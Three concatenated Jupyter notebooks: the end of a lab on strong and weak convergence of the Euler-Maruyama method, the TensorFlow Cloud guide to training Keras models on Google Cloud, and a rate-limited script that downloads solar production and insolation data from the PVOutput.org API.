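endpoint_error = abs(X[-1] - X_exact[-1])
```

Plotting `X` against `X_exact` over `t` shows the pathwise agreement for this fixed timestep.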
# Vary the timestep of the Brownian path and check how the numerical solution compares to the exact solution.
# ## Convergence
# We have two ways of thinking about Brownian paths or processes.
#
# We can fix the path (ie fix $\text{d}W$) and vary the timescale on which we're looking at it: this gives us a single random path, and we can ask how the numerical method converges for this single realization. This is *strong convergence*.
#
# Alternatively, we can view each path as a single realization of a random process that should average to zero. We can then look at how the method converges as we average over a large number of realizations, *also* looking at how it converges as we vary the timescale. This is *weak convergence*.
#
# Formally, denote the true solution as $X(T)$ and the numerical solution for a given step length $h$ as $X^h(T)$. The order of convergence is denoted $p$.
#
# #### Strong convergence
#
# $$
# \mathbb{E} \left| X(T) - X^h(T) \right| \le C h^{p}
# $$
# For Euler-Maruyama, expect $p=1/2$.
#
# #### Weak convergence
#
# $$
# \left| \mathbb{E} \left( \phi( X(T) ) \right) - \mathbb{E} \left( \phi( X^h(T) ) \right) \right| \le C h^{p}
# $$
# For Euler-Maruyama, expect $p=1$.
# ### Tasks
# Investigate the weak and strong convergence of your method, applied to the problem above.
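One way to sketch the strong-convergence study (coarsening a single fine Brownian path by a factor `R`, averaged over `M` realizations; all constants here are arbitrary choices):

```python
import numpy

numpy.random.seed(100)
lam, mu, X0, T = 2.0, 1.0, 1.0, 1.0    # arbitrary parameter choices
M = 500                                 # number of Brownian paths
N_fine = 512
dt_fine = T / N_fine
dW = numpy.sqrt(dt_fine) * numpy.random.randn(M, N_fine)
# Exact endpoint along each path
X_exact = X0 * numpy.exp((lam - 0.5 * mu**2) * T + mu * dW.sum(axis=1))

errors = []
for R in [1, 2, 4, 8, 16]:              # coarsen the fine path by factor R
    dt = R * dt_fine
    X = numpy.full(M, X0)
    for n in range(N_fine // R):
        dW_coarse = dW[:, n * R:(n + 1) * R].sum(axis=1)
        X = X + dt * lam * X + mu * X * dW_coarse
    errors.append(numpy.mean(numpy.abs(X - X_exact)))
# Strong order 1/2: errors should grow roughly like sqrt(dt)
```

A log-log plot of `errors` against the step sizes should show a slope of about $1/2$.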
FEEG6016 Simulation and Modelling/09-Stochastic-DEs-Lab-1.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="b518b04cbfe0"
# ##### Copyright 2020 The TensorFlow Authors.
# + cellView="form" id="906e07f6e562"
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + [markdown] id="c359f002e834"
# # Training Keras models with TensorFlow Cloud
# + [markdown] id="f5c893a15fac"
# <table class="tfo-notebook-buttons" align="left">
# <td><a target="_blank" href="https://www.tensorflow.org/guide/keras/training_keras_models_on_cloud"><img src="https://www.tensorflow.org/images/tf_logo_32px.png">View on TensorFlow.org</a></td>
# <td> <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/ja/guide/keras/training_keras_models_on_cloud.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png"> Run in Google Colab</a>
# </td>
# <td><a target="_blank" href="https://github.com/tensorflow/docs-l10n/blob/master/site/ja/guide/keras/training_keras_models_on_cloud.ipynb"> <img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png"> View source on GitHub</a></td>
# <td> <a href="https://storage.googleapis.com/tensorflow_docs/docs-l10n/site/ja/guide/keras/training_keras_models_on_cloud.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png">Download notebook</a>
# </td>
# </table>
# + [markdown] id="b1c0246f8536"
# ## Introduction
#
# [TensorFlow Cloud](https://github.com/tensorflow/cloud) is a Python package that provides APIs for a seamless transition from local debugging to distributed training in Google Cloud. It simplifies the process of training TensorFlow models on the cloud into a single, simple function call, requiring minimal setup and no changes to your model. TensorFlow Cloud handles cloud-specific tasks such as creating VM instances and distribution strategies for your models automatically. This guide demonstrates how to interface with Google Cloud through TensorFlow Cloud, and the wide range of functionality provided within TensorFlow Cloud. We'll start with the simplest use case.
# + [markdown] id="e015c75faba2"
# ## Setup
#
# We'll get started by installing TensorFlow Cloud, and importing the packages we will need in this guide.
# + id="99e5bc5e0ab8"
# !pip install -q tensorflow_cloud
# + id="26113effabca"
import tensorflow as tf
import tensorflow_cloud as tfc
from tensorflow import keras
from tensorflow.keras import layers
# + [markdown] id="e8568395c87b"
# ## API overview: a first end-to-end example
#
# Let's begin with a Keras model training script, such as the following CNN:
#
# ```python
# (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
#
# model = keras.Sequential(
# [
# keras.Input(shape=(28, 28)),
# # Use a Rescaling layer to make sure input values are in the [0, 1] range.
# layers.experimental.preprocessing.Rescaling(1.0 / 255),
# # The original images have shape (28, 28), so we reshape them to (28, 28, 1)
# layers.Reshape(target_shape=(28, 28, 1)),
# # Follow-up with a classic small convnet
# layers.Conv2D(32, 3, activation="relu"),
# layers.MaxPooling2D(2),
# layers.Conv2D(32, 3, activation="relu"),
# layers.MaxPooling2D(2),
# layers.Conv2D(32, 3, activation="relu"),
# layers.Flatten(),
# layers.Dense(128, activation="relu"),
# layers.Dense(10),
# ]
# )
#
# model.compile(
# optimizer=keras.optimizers.Adam(),
# loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True),
# metrics=keras.metrics.SparseCategoricalAccuracy(),
# )
#
# model.fit(x_train, y_train, epochs=20, batch_size=128, validation_split=0.1)
# ```
# + [markdown] id="514f51a9a45d"
# To train this model on Google Cloud, all you need to do is add a call to `run()` at the beginning of the script, before the imports:
#
# ```python
# tfc.run()
# ```
# + [markdown] id="6e38288bb617"
# You don't need to worry about cloud-specific tasks such as creating VM instances and distribution strategies when using TensorFlow Cloud. The API includes intelligent defaults for all the parameters -- everything is configurable, but many models can rely on these defaults.
#
# Upon calling `run()`, TensorFlow Cloud will:
#
# - Make your Python script or notebook distribution-ready.
# - Convert it into a Docker image with the required dependencies.
# - Run the training job on a GCP GPU-powered VM.
# - Stream relevant logs and job information.
#
# The default VM configuration is 1 chief and 0 workers with 8 CPU cores and 1 Tesla T4 GPU.
# + [markdown] id="3ab860e037c9"
# ## Google Cloud configuration
#
# In order to facilitate the proper pathways for Cloud training, you will need to do some first-time setup. If you're a new Google Cloud user, there are a few preliminary steps you will need to take:
#
# 1. Create a GCP Project;
# 2. Enable AI Platform Services;
# 3. Create a Service Account;
# 4. Download an authorization key;
# 5. Create a Cloud Storage bucket.
#
# Detailed first-time setup instructions can be found in the [TensorFlow Cloud README](https://github.com/tensorflow/cloud#setup-instructions), and an additional setup example is shown on the [TensorFlow Blog](https://blog.tensorflow.org/2020/08/train-your-tensorflow-model-on-google.html).
#
# ## Common workflows and Cloud storage
#
# In most cases, you'll want to retrieve your model after training on Google Cloud. For this, it's crucial to redirect saving and loading to Cloud Storage while training remotely. We can direct TensorFlow Cloud to our Cloud Storage bucket for a variety of tasks. The storage bucket can be used to save and load large training datasets, store callback logs or model weights, and save trained model files. To begin, let's configure `fit()` to save the model to Cloud Storage, and set up TensorBoard monitoring to track training progress.
# + id="af5077731187"
def create_model():
model = keras.Sequential(
[
keras.Input(shape=(28, 28)),
layers.experimental.preprocessing.Rescaling(1.0 / 255),
layers.Reshape(target_shape=(28, 28, 1)),
layers.Conv2D(32, 3, activation="relu"),
layers.MaxPooling2D(2),
layers.Conv2D(32, 3, activation="relu"),
layers.MaxPooling2D(2),
layers.Conv2D(32, 3, activation="relu"),
layers.Flatten(),
layers.Dense(128, activation="relu"),
layers.Dense(10),
]
)
model.compile(
optimizer=keras.optimizers.Adam(),
loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=keras.metrics.SparseCategoricalAccuracy(),
)
return model
# + [markdown] id="5f2e65d8f3a6"
# Let's save the TensorBoard logs and model checkpoints generated during training in our cloud storage bucket.
# + id="fdc4f951281c"
import datetime
import os
# Note: Please change the gcp_bucket to your bucket name.
gcp_bucket = "keras-examples"
checkpoint_path = os.path.join("gs://", gcp_bucket, "mnist_example", "save_at_{epoch}")
tensorboard_path = os.path.join( # Timestamp included to enable timeseries graphs
"gs://", gcp_bucket, "logs", datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
)
callbacks = [
# TensorBoard will store logs for each epoch and graph performance for us.
keras.callbacks.TensorBoard(log_dir=tensorboard_path, histogram_freq=1),
# ModelCheckpoint will save models after each epoch for retrieval later.
keras.callbacks.ModelCheckpoint(checkpoint_path),
# EarlyStopping will terminate training when val_loss ceases to improve.
keras.callbacks.EarlyStopping(monitor="val_loss", patience=3),
]
model = create_model()
# + [markdown] id="45d6210176e6"
# Here, we'll load our data from Keras directly. In general, it's best practice to store your dataset in your Cloud Storage bucket, however TensorFlow Cloud can also accommodate datasets stored locally. That's covered in the multi-file section of this guide.
# + id="bd4ef6ffa611"
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
# + [markdown] id="b1d2a2688887"
# The [TensorFlow Cloud](https://github.com/tensorflow/cloud) API provides the `remote()` function to determine whether code is being executed locally or on the cloud. This allows for the separate designation of `fit()` parameters for local and remote execution, and provides means for easy debugging without overloading your local machine.
# + id="cfab9ff41fd5"
if tfc.remote():
epochs = 100
callbacks = callbacks
batch_size = 128
else:
epochs = 5
batch_size = 64
callbacks = None
model.fit(x_train, y_train, epochs=epochs, callbacks=callbacks, batch_size=batch_size)
# + [markdown] id="9b27c0b3b7db"
# Once training is complete, let's save the model to GCS.
# + id="b00451dcfeab"
save_path = os.path.join("gs://", gcp_bucket, "mnist_example")
if tfc.remote():
model.save(save_path)
# + [markdown] id="0dceb5b7a173"
# We can also use this storage bucket for Docker image building, instead of your local Docker instance. For this, just add your bucket to the `docker_image_bucket_name` parameter.
# + id="13200523ed93"
# docs_infra: no_execute
tfc.run(docker_image_bucket_name=gcp_bucket)
# + [markdown] id="060a2112c34e"
# After the model is trained, we can load the saved model and view our TensorBoard logs to monitor its performance.
# + id="b8d773e2cfb7"
# docs_infra: no_execute
model = keras.models.load_model(save_path)
# + id="05d1d68bae5a"
# docs_infra: no_execute
# !tensorboard dev upload --logdir "gs://keras-examples-jonah/logs/fit" --name "Guide MNIST"
# + [markdown] id="3785ece03a8f"
# ## Large-scale projects
#
# In many cases, your project containing a Keras model may encompass more than one Python script, or may involve external data or specific dependencies. TensorFlow Cloud is entirely flexible for large-scale deployment, and provides a number of intelligent functionalities to aid your projects.
#
# ### Entry points: support for Python scripts and Jupyter notebooks
#
# Your call to the `run()` API won't always be contained inside the same Python script as your model training code. For this purpose, we provide an `entry_point` parameter. The `entry_point` parameter can be used to specify the Python script or notebook in which your model training code lives. When calling `run()` from the same script as your model, use the `entry_point` default of `None`.
#
# ### `pip` dependencies
#
# If your project calls on additional `pip` dependencies, it's possible to specify the additional required libraries by including a `requirements.txt` file. In this file, simply put a list of all the required dependencies and TensorFlow Cloud will handle integrating these into your cloud build.
#
# ### Python notebooks
#
# TensorFlow Cloud is also runnable from Python notebooks. Additionally, your specified `entry_point` can be a notebook if needed. There are two key differences to keep in mind between TensorFlow Cloud on notebooks compared to scripts:
#
# - When calling `run()` from within a notebook, a Cloud Storage bucket must be specified for building and storing your Docker image.
# - GCloud authentication happens entirely through your authentication key, without project specification. An example workflow using TensorFlow Cloud from a notebook is provided in the "Putting it all together" section of this guide.
#
# ### Multi-file projects
#
# If your model depends on additional files, you only need to ensure that these files live in the same directory (or subdirectory) as the specified entry point. Every file that is stored in the same directory as the specified `entry_point` will be included in the Docker image, as well as any files stored in subdirectories adjacent to the `entry_point`. This is also true for dependencies you may need which can't be acquired through `pip`.
#
# For an example of a custom entry point and multi-file project with additional pip dependencies, take a look at the multi-file example on the [TensorFlow Cloud Repository](https://github.com/tensorflow/cloud/tree/master/src/python/tensorflow_cloud/core/tests/examples/multi_file_example). For brevity, we'll just include the example's `run()` call:
#
# ```python
# tfc.run(
# docker_image_bucket_name=gcp_bucket,
# entry_point="train_model.py",
# requirements="requirements.txt"
# )
# ```
# + [markdown] id="997e3f89c734"
# ## Machine configurations and distributed training
#
# Model training can require a wide range of different resources, depending on the size of the model or the dataset. When accounting for configurations with multiple GPUs, it becomes critical to choose a fitting [distribution strategy](https://www.tensorflow.org/guide/distributed_training). Here, we outline a few possible configurations:
#
# ### Multi-worker distribution
#
# Here, we can use `COMMON_MACHINE_CONFIGS` to designate 1 chief CPU and 4 worker GPUs.
#
# ```python
# tfc.run(
# docker_image_bucket_name=gcp_bucket,
# chief_config=tfc.COMMON_MACHINE_CONFIGS['CPU'],
# worker_count=2,
# worker_config=tfc.COMMON_MACHINE_CONFIGS['T4_4X']
# )
# ```
#
# By default, TensorFlow Cloud chooses the best distribution strategy for your machine configuration with a simple formula, using the `chief_config`, `worker_config` and `worker_count` parameters provided.
#
# - If the number of GPUs specified is greater than zero, `tf.distribute.MirroredStrategy` will be chosen.
# - If the number of workers is greater than zero, `tf.distribute.experimental.MultiWorkerMirroredStrategy` or `tf.distribute.experimental.TPUStrategy` will be chosen, depending on the accelerator type.
# - Otherwise, `tf.distribute.OneDeviceStrategy` will be chosen.
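# The default selection rule above can be sketched as a plain function (a
# hedged illustration only: `pick_strategy` and its string results are not
# part of the TensorFlow Cloud API, and we assume the worker check takes
# precedence when both workers and GPUs are configured):

```python
def pick_strategy(gpu_count: int, worker_count: int, accelerator: str) -> str:
    """Name the distribution strategy implied by the rules above."""
    if worker_count > 0:
        # Accelerator type decides between multi-worker GPU and TPU setups.
        if accelerator == "TPU":
            return "TPUStrategy"
        return "MultiWorkerMirroredStrategy"
    if gpu_count > 0:
        return "MirroredStrategy"
    return "OneDeviceStrategy"
```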
# + [markdown] id="e0d938efab72"
# ### TPU distribution
#
# Let's train the same model on TPU, as shown:
#
# ```python
# tfc.run(
# docker_image_bucket_name=gcp_bucket,
# chief_config=tfc.COMMON_MACHINE_CONFIGS["CPU"],
# worker_count=1,
# worker_config=tfc.COMMON_MACHINE_CONFIGS["TPU"]
# )
# ```
# + [markdown] id="d1dec83a0b19"
# ### Custom distribution strategy
#
# To specify a custom distribution strategy, format your code normally as you would according to the [distributed training guide](https://www.tensorflow.org/guide/distributed_training) and set `distribution_strategy` to `None`. Below, we'll specify our own distribution strategy for the same MNIST model.
#
# ```python
# (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
#
# mirrored_strategy = tf.distribute.MirroredStrategy()
# with mirrored_strategy.scope():
# model = create_model()
#
# if tfc.remote():
# epochs = 100
# batch_size = 128
# else:
# epochs = 10
# batch_size = 64
# callbacks = None
#
# model.fit(
# x_train, y_train, epochs=epochs, callbacks=callbacks, batch_size=batch_size
# )
#
# tfc.run(
# docker_image_bucket_name=gcp_bucket,
# chief_config=tfc.COMMON_MACHINE_CONFIGS['CPU'],
# worker_count=2,
# worker_config=tfc.COMMON_MACHINE_CONFIGS['T4_4X'],
# distribution_strategy=None
# )
# ```
# + [markdown] id="0a50b62bf672"
# ## Custom Docker images
#
# By default, TensorFlow Cloud uses a [Docker base image](https://hub.docker.com/r/tensorflow/tensorflow/) supplied by Google and corresponding to your current TensorFlow version. However, you can also specify a custom Docker image to fit your build requirements, if necessary. For this example, we will specify the Docker image from an older version of TensorFlow:
#
# ```python
# tfc.run(
# docker_image_bucket_name=gcp_bucket,
# base_docker_image="tensorflow/tensorflow:2.1.0-gpu"
# )
# ```
# + [markdown] id="bb659015ffad"
# ## Additional metrics
#
# You may find it useful to tag your Cloud jobs with specific labels, or to stream your model's logs during Cloud training. It's good practice to maintain proper labeling on all Cloud jobs, for record-keeping. For this purpose, `run()` accepts a dictionary of labels of up to 64 key-value pairs, which are visible from the Cloud build logs. Logs such as epoch performance and model-saving internals can be accessed using the link provided by executing `tfc.run`, or printed to your local terminal using the `stream_logs` flag.
#
# ```python
# job_labels = {"job": "mnist-example", "team": "keras-io", "user": "jonah"}
#
# tfc.run(
# docker_image_bucket_name=gcp_bucket,
# job_labels=job_labels,
# stream_logs=True
# )
# ```
# + [markdown] id="b34a2e8e09c3"
# ## Putting it all together
#
# For an in-depth Colab which uses many of the features described in this guide, follow along [this example](https://github.com/tensorflow/cloud/blob/master/src/python/tensorflow_cloud/core/tests/examples/dogs_classification.ipynb) to train a state-of-the-art model to recognize dog breeds from photos, using feature extraction.
site/ja/guide/keras/training_keras_models_on_cloud.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Synopsis
# PURPOSE:
#
# Fetch from the PVOutput.org API the data of a target station:
# - "live" production data (i.e. 5-to-10-minute time steps, no weather) ==> Detail_PROD
# - insolation data (i.e. 5-to-10-minute time steps, no weather; not entirely clear whether it corresponds exactly to extraterrestrial radiation) ==> Detail_INSOL
# - daily production data (sum over the day, also available monthly etc.; adds a (categorical) field for cloud cover) ==> Aggreg_PROD
# PRINCIPLE:
#
# Successive processing of the 3 request types (plus, as a bonus, the installation characteristics):
# - Formulate and test the request
# - Determine the dates:
#     - Build the maximal list of dates
#     - From the logs, determine the dates for which we already have the data
#     - Build the new list of dates to request (new dates or previous errors)
# - Request loop
#     - Load the DataFrame from disk
#     - Send the request
#     - Append the received data to the DataFrame
# - Export the results (pkl and csv)
#     - Logs
#     - Data
# CHANGELOG:
# v2.2 Added handling of already-downloaded dates
# TODO:
# - recalling the already-downloaded dates does not work as it should
# - the upper bound of the dates to call is not requested (exclusive instead of inclusive)
# - apply the refactoring into functions to the other URLs
# - <<Careful! for the aggregated data some things will have to be reworked
# - convert the dtypes when creating the DataFrames
# - merge the Date and Time columns into a single timestamp?
#
# - Handle the API limits
#     - "Rate limit information can be obtained by setting the HTTP header X-Rate-Limit to 1" https://pvoutput.org/help.html
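# The API responses handled throughout this notebook are plain text, with
# records separated by ';' and fields separated by ','. A minimal offline
# sketch of that parsing (`parse_pvoutput` is a hypothetical helper name,
# not part of the PVOutput API):

```python
def parse_pvoutput(text, columns):
    """Split a raw PVOutput-style response into a list of dicts."""
    records = []
    for line in text.split(';'):
        fields = line.split(',')
        records.append(dict(zip(columns, fields)))
    return records

# Two fake 5-minute records, shaped like a getinsolation response
sample = "07:00,12,3;07:05,15,4"
rows = parse_pvoutput(sample, ["Time", "Power", "Energy"])
# rows[0] == {"Time": "07:00", "Power": "12", "Energy": "3"}
```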
# # Libraries and setup
# +
# Libraries
#Misc
import requests #API calls
import time #For dates (today etc.)
import os #For folder creation etc.
import pandas as pd
#Plotting
# +
# Notebook formatting
# Number of rows to display #Jupyter Notebook only?
# pd.options.display.max_rows=100
# Cell width #Jupyter Notebook only?
# from IPython.core.display import display, HTML
# display(HTML("<style>.container { width:80% !important; }</style>"))
# Output every result of a cell, not just the last one
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all" #"last_expr"
# A basic debugger
from IPython.core.debugger import Tracer # Placing Tracer()() inside a function gives step-by-step execution: "n(ext) line and run this one, c(ontinue) running until next breakpoint, q(uit) the debugger"
# + [markdown] toc-hr-collapsed=true
# # Global parameters
# +
# Generic request parameters
notre_sys_id = '&sid=66192'
api_key = '&key=<KEY>'
target_sys_id = '&sid1=13412'
para_gene = notre_sys_id+api_key+target_sys_id
# -
# ## Date bounds
# + active=""
# # Test values (SWAP WITH THE PRODUCTION VALUES)
#
# wait = 1 #"300 requests per hour in donation mode.", i.e. a minimum wait of 12 s
# date_recente = pd.to_datetime('20121115', format="%Y%m%d", errors='coerce')
# date_ancienne = pd.to_datetime('20121114', format="%Y%m%d", errors='coerce') # First date from which usable data exist
# +
# Production values
wait = 13 #"300 requests per hour in donation mode.", i.e. a minimum wait of 12 s
date_recente = pd.to_datetime('today')
date_ancienne = pd.to_datetime('20121114', format="%Y%m%d", errors='coerce') # First date from which usable data exist
# -
# # Function definitions
# ## Testing the API call
def TEST_CALL_API(url, date="20130101", colonnes=[]):
    ''' url, date(opt), colonnes(opt) --> df
    url (URL without the target date),
    date (text format, default 20130101),
    colonnes (list of column names)
'''
#Tracer()()
reponse_l = []
for ligne in requests.get(url+'&d='+date).text.split(';'):
reponse_l.append(ligne.split(','))
df = pd.DataFrame.from_records(reponse_l)
if len(colonnes) == df.shape[1]:
df.columns = colonnes
return df.head()
# ## Instantiation (potentially by loading already-downloaded data)
def CHARGEMENT_DONNEES_DISQUE(path, file_name_core, logs_colonnes_l, data_colonnes_l):
    '''(path, file_name_core) --> (log_df, data_df)
    NB: if the files are not found, empty DataFrames are instantiated, but they are not written to disk here. That is done by the save function, which assigns the column names in the same pass.
    '''
    # Folder
    if os.path.exists(path):
        print("Folder %s: found" % path)
    else:
        os.makedirs(path)
        print("Folder %s: not found, created" % path)
    # Log file:
    if os.path.isfile(path + file_name_core +"_log.pkl") and os.access(path + file_name_core + "_log.pkl", os.R_OK):
        print("File %s: found and loaded" % (file_name_core +"_log.pkl"))
        log_df = pd.read_pickle(path + file_name_core + "_log.pkl")
    else:
        print("File %s: not found, a new one is instantiated" % (file_name_core +"_log.pkl"))
        log_df = pd.DataFrame(columns= logs_colonnes_l)
    # Data file:
    if os.path.isfile(path + file_name_core +"_data.pkl") and os.access(path + file_name_core + "_data.pkl", os.R_OK):
        print("File %s: found and loaded" % (file_name_core +"_data.pkl"))
        data_df = pd.read_pickle(path + file_name_core + "_data.pkl")
    else:
        print("File %s: not found, a new one is instantiated" % (file_name_core +"_data.pkl"))
        data_df = pd.DataFrame(columns = data_colonnes_l)
return (log_df, data_df)
# ## Building the list of dates to call
def FUNC_DATES_TO_CALL(log_df): #<<CAREFUL: adapt for the aggregated production data, whose request does not use the same kind of date list
    '''log_df --> dates_requetes_l
    '''
    # Build the list of dates (as str) to pass as request argument:
    dates_possibles_l = pd.date_range(start= date_ancienne, end= date_recente).strftime('%Y%m%d')
    dates_deja_obtenues_l = list(log_df.loc[log_df['Réponse'] == 200, 'Date_cible'])
    dates_requetes_l = [date for date in dates_possibles_l if date not in dates_deja_obtenues_l]
    #print("dates_possibles_l", type(dates_possibles_l), dates_possibles_l)
    #print("dates_deja_obtenues_l", type(dates_deja_obtenues_l), dates_deja_obtenues_l)
    #print("dates_requetes_l", type(dates_requetes_l), dates_requetes_l)
    # Estimated processing time (in hours)
    print("Already obtained %d dates out of %d, i.e. %d dates still to fetch" % (len(dates_deja_obtenues_l), len(dates_possibles_l), len(dates_requetes_l)))
    print("Processing this batch will take %.2f hours" % ((len(dates_requetes_l)*wait)/(60*60)))
return dates_requetes_l
# ## Batched API calls
def FUNC_CALL_API_JOUR(dates_requetes_l, wait, url, log_df, data_df):
    '''(dates_requetes_l, wait, url, log_df, data_df) --> (log_df, data_df), updated
'''
for date in dates_requetes_l :
        #Rate limiter
        time.sleep(wait) #"300 requests per hour in donation mode.", i.e. a minimum wait of 12 s
        #Send request
        requete = requests.get(url + '&d=' + date)
        #Live progress
        print("Processing date: ", date, "\t",requete.status_code)
        #Log the call
log_df = log_df.append(
dict(
zip(
log_df.columns,
[pd.to_datetime('today'), date, requete.status_code]
)
),
ignore_index=True
)
        #Check response validity
if requete.status_code == 200:
for ligne in requete.text.split(';'):
                #Append to the DataFrame
data_df = data_df.append(
dict(
zip(
data_df,
                                                (ligne.split(',') + [date]) # Small trick due to the insolation request, which does not return the date (==> we force the column's presence and set its value here)
)
),
ignore_index=True
)
return (log_df, data_df)
# ## Saving to disk
def FUNC_ENREGISTREMENT_DISQUE(path, file_name_core, log_df, data_df):
    '''(path, file_name_core, log_df, data_df) --> Save log_df and data_df as pkl and csv in the specified folder
'''
# Logs
log_df.to_pickle(path + file_name_core + "_log.pkl")
log_df.to_csv(path + file_name_core + "_log.csv", index= False)
# Df
data_df.to_pickle(path + file_name_core + "_data.pkl")
data_df.to_csv(path + file_name_core + "_data.csv", index= False)
    print("Files saved")
# ## DataFrame check
def CHECK_DF(df):
    '''df --> number of rows, number of duplicate rows, df.info() and df.head(15)
'''
    print("number of rows: ", len(df))
    print("number of duplicate rows: ", df.duplicated().sum(), "\n")
df.info()
return df.head(15)
# ## Debug value set
# + active=""
# #Variable set for debugging
#
# path = detail_INSOLATION_path
# file_name_core = detail_INSOLATION_file_name_core
# logs_colonnes_l = detail_INSOLATION_logs_colonnes_l
# data_colonnes_l = detail_INSOLATION_data_colonnes_l
# url = detail_INSOLATION_url
# + active=""
# # Test the API call for this URL
#
# TEST_CALL_API(url, colonnes = data_colonnes_l)
# + active=""
# # Load the data
#
# (log_df, data_df) = CHARGEMENT_DONNEES_DISQUE(path, file_name_core, logs_colonnes_l, data_colonnes_l)
# + active=""
# # List of dates to call
#
# dates_requetes_l = FUNC_DATES_TO_CALL(log_df)
# + active=""
# # Call API
#
# (log_df, data_df) = FUNC_CALL_API_JOUR(dates_requetes_l, wait, url, log_df, data_df)
# + active=""
# # Save to disk
#
# FUNC_ENREGISTREMENT_DISQUE(path, file_name_core, log_df, data_df)
# + active=""
# # Data check
#
# CHECK_DF(data_df)
# -
# # Détail_PRODUCTION
#
# One day's production detail (getstatus).
# 10-minute temporal resolution.
# +
# Parameters for "Production detail"
# Misc
detail_PRODUCTION_path = "./DETAIL_PRODUCTION/" #Mind that trailing / at the end of the path ;)
detail_PRODUCTION_file_name_core = "detail_PRODUCTION"
detail_PRODUCTION_logs_colonnes_l = ["TS_Call", "Date_cible", "Réponse"]
detail_PRODUCTION_data_colonnes_l = ["Date", "Time", "Energy_Generation", "Energy_Efficiency", "Instantaneous_Power", "Average_Power", "Normalised_Output", "Energy_Consumption", "Power_Consumption", "Temperature", "Voltage"] #/ The parameter sid1 is able to retrieve generation data from any system. Consumption data is not returned. The requesting system must have donation mode enabled.
# URL
detail = '&h=1' #The history parameter returns the entire status for a given date.
nb_max = '&limit=288' #Must be set to the maximum value of 288
ordre = '&asc=1'
detail_PRODUCTION_url = 'https://pvoutput.org/service/r2/getstatus.jsp?'+detail+nb_max+ordre+para_gene
# -
# Test
reponse = requests.get(detail_PRODUCTION_url+'&d='+"20121114")
reponse.status_code
reponse.text.split(';')
# Batch processing
# +
# Test the API call for this URL
TEST_CALL_API(
detail_PRODUCTION_url,
colonnes = detail_PRODUCTION_data_colonnes_l)
# Load / instantiate the DataFrames:
(detail_PRODUCTION_log_df, detail_PRODUCTION_data_df) = CHARGEMENT_DONNEES_DISQUE(
detail_PRODUCTION_path,
detail_PRODUCTION_file_name_core,
detail_PRODUCTION_logs_colonnes_l,
detail_PRODUCTION_data_colonnes_l
)
# Build the list of missing dates:
detail_PRODUCTION_dates_requetes_l = FUNC_DATES_TO_CALL(
detail_PRODUCTION_log_df)
# Call the API for the missing dates:
(detail_PRODUCTION_log_df, detail_PRODUCTION_data_df) = FUNC_CALL_API_JOUR(
detail_PRODUCTION_dates_requetes_l,
wait,
detail_PRODUCTION_url,
detail_PRODUCTION_log_df,
detail_PRODUCTION_data_df)
# Save to disk:
FUNC_ENREGISTREMENT_DISQUE(
detail_PRODUCTION_path,
detail_PRODUCTION_file_name_core,
detail_PRODUCTION_log_df,
detail_PRODUCTION_data_df)
# Check the available dataset:
CHECK_DF(detail_PRODUCTION_data_df)
# + [markdown] toc-hr-collapsed=true
# # Détail_INSOLATION
#
# One day's insolation detail (getinsolation).
# 5-minute temporal resolution.
# +
# Parameters for "Insolation detail"
# Misc
detail_INSOLATION_path = "./DETAIL_INSOLATION/" #Mind that trailing / at the end of the path ;)
detail_INSOLATION_file_name_core = "detail_INSOLATION"
detail_INSOLATION_logs_colonnes_l = ["TS_Call", "Date_cible", "Réponse"]
detail_INSOLATION_data_colonnes_l = ["Time", "Power", "Energy", "Date"] #The date must be injected manually: since the call can only target a single day, it is omitted from the response!
# URL
#No interesting parameters
detail_INSOLATION_url = 'https://pvoutput.org/service/r2/getinsolation.jsp?'+para_gene
# +
# Test the API call for this URL
TEST_CALL_API(
detail_INSOLATION_url,
colonnes = detail_INSOLATION_data_colonnes_l)
# Load / instantiate the DataFrames:
(detail_INSOLATION_log_df, detail_INSOLATION_data_df) = CHARGEMENT_DONNEES_DISQUE(
detail_INSOLATION_path,
detail_INSOLATION_file_name_core,
detail_INSOLATION_logs_colonnes_l,
detail_INSOLATION_data_colonnes_l)
# Build the list of missing dates:
detail_INSOLATION_dates_requetes_l = FUNC_DATES_TO_CALL(
detail_INSOLATION_log_df)
# Call the API for the missing dates:
(detail_INSOLATION_log_df, detail_INSOLATION_data_df) = FUNC_CALL_API_JOUR(
detail_INSOLATION_dates_requetes_l,
wait,
detail_INSOLATION_url,
detail_INSOLATION_log_df,
detail_INSOLATION_data_df)
# Save to disk:
FUNC_ENREGISTREMENT_DISQUE(
detail_INSOLATION_path,
detail_INSOLATION_file_name_core,
detail_INSOLATION_log_df,
detail_INSOLATION_data_df)
# Check the available dataset:
CHECK_DF(
detail_INSOLATION_data_df)
# + [markdown] toc-hr-collapsed=false
# # Aggrég_PRODUCTION
#
# Set of aggregated production values over a day (getoutput).
# 1-day temporal resolution.
# -
# Todo:
# - Load values from the files (not really needed, but cleaner)
# - Clean up the function arguments (the debug ones are currently in place)
# +
# Parameters for "Aggregated production"
# Misc
aggreg_PRODUCTION_path = "./AGGREGATION_PRODUCTION/" #Mind that trailing / at the end of the path ;)
aggreg_PRODUCTION_file_name_core = "aggreg_PRODUCTION"
aggreg_PRODUCTION_logs_colonnes_l = ["TS_Call", "Date_Début_Période", "Date_Fin_Période", "Nb_j", "Réponse"]
